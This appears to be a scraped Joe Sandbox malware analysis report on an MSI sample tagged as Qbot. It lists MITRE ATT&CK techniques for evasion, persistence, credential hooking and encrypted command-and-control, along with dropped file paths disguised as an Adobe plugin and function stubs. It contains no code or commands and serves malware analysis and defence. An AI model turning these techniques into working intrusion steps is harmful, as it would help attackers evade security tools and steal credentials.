Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Loaded DLLs, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system. Peripheral devices could include auxiliary resources that support a variety of functionalities such as keyboards, printers, cameras, smart card readers, or removable storage. The information may be used to enhance their awareness of the system and network environment or may be used for further actions.
Tactics:	Discovery
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report r3zg12.msi

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Qbot

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Config.Msi\5334e8.rbs

C:\Users\user\AppData\Local\AdobeAcrobatPDFBrowserPlugin\main.dll

C:\Users\user\AppData\Local\AdobeAcrobatPDFBrowserPlugin\notify.vbs

C:\Windows\Installer\5334e7.msi

C:\Windows\Installer\5334e9.msi

C:\Windows\Installer\MSI36EA.tmp

C:\Windows\Installer\SourceHash{BADFC54D-C40E-45B2-8055-C154444F1F83}

C:\Windows\Installer\inprogressinstallinfo.ipi

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log

C:\Windows\Temp\~DF09B6AE6DA39A576A.TMP

C:\Windows\Temp\~DF29580D728BC5B4ED.TMP

C:\Windows\Temp\~DF385081A1CE239BA3.TMP

C:\Windows\Temp\~DF3DD2B7692E631D41.TMP

C:\Windows\Temp\~DF4C3BF86A9825BAFE.TMP

C:\Windows\Temp\~DF5DF60473004ABCC7.TMP

C:\Windows\Temp\~DF6B3BC2C5354ED014.TMP

Windows Analysis Report
r3zg12.msi

Function 1002A4FB Relevance: 1.5, APIs: 1, Instructions: 19
memoryCOMMON

Function 1002A61E Relevance: 1.3, APIs: 1, Instructions: 75
memoryCOMMON

Function 1002A4E1 Relevance: 1.3, APIs: 1, Instructions: 47
COMMON

Function 1000D4D0 Relevance: 33.6, APIs: 13, Strings: 6, Instructions: 306
COMMONCrypto

Function 100132D0 Relevance: 28.6, APIs: 19, Instructions: 136
COMMON

Function 1002082C Relevance: 23.4, APIs: 11, Strings: 2, Instructions: 635
COMMONCrypto

Function 10013480 Relevance: 9.3, APIs: 6, Instructions: 286
COMMONCrypto

Function 1004B2A5 Relevance: 4.0, Strings: 3, Instructions: 241
COMMONCrypto